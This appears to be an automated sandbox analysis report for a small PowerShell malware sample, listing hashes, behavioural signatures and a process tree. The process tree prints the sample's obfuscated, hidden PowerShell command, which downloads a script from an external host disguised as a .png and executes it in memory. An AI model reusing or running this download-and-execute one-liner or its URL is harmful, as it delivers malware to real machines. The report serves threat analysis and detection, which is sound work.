Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-01-2025 09:46
Static task
static1
Behavioral task
behavioral1
Sample
mal.ps1
Resource
win7-20240903-en
General
-
Target
mal.ps1
-
Size
477B
-
MD5
106e8b1d646ba58948fa57cd919784b5
-
SHA1
3c85495907a81aef34897e341703d2f7ad92a15b
-
SHA256
572175d8c355a0e9e993eb3855fbb8b8aaac38ebb57eb14eb4757d52ec4605a7
-
SHA512
a203b40d0b577f8e113c449520da60ad194e031be591132c6cbce38a7afa21fe4f6ea6cd88e27d4bdc42ec12acbb5861175be62a3b721968906f754a44d038ac
Malware Config
Extracted
https://n.kliphirofey.shop/43cee3481683f8897547367aa517dd31.png
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2416 powershell.exe -
pid Process 2488 powershell.exe 2416 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2488 powershell.exe 2488 powershell.exe 2488 powershell.exe 2416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2488 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2488 wrote to memory of 2416 2488 powershell.exe 31 PID 2488 wrote to memory of 2416 2488 powershell.exe 31 PID 2488 wrote to memory of 2416 2488 powershell.exe 31 PID 2488 wrote to memory of 2416 2488 powershell.exe 31
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\mal.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command 'Z8'|ForEach-Object{Set-Item Variable:/Z8 ([PowerShell]::Create())}{$Null=(Item Variable:Z8).Value.(($Z8|Get-Member)[5].Name).Invoke(((New-Object Net.WebClient).DownloadString('https://n.kliphirofey.shop/43cee3481683f8897547367aa517dd31.png')))}{(Item Variable:Z8).Value.Invoke()}{(Item Variable:Z8).Value.Dispose()}2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7AVOADWMFTUO003R536U.temp
Filesize7KB
MD5d1632232f428023d5c926618b41928e9
SHA1c177cb380f3fa383b4e80d77c1e0cd9c01192cc5
SHA2564e7a712dc81d0a212ad4de3eae933bbdaa115e08f61b6b783f0f1a6385eae740
SHA512e1c62b62bd1a3951c9c189b57ff5c83dc601c847fac2e62db81eaeb402d69db35590c6d954775f598650fd07105c595e909f5f99f887453c3007fc43a66987b5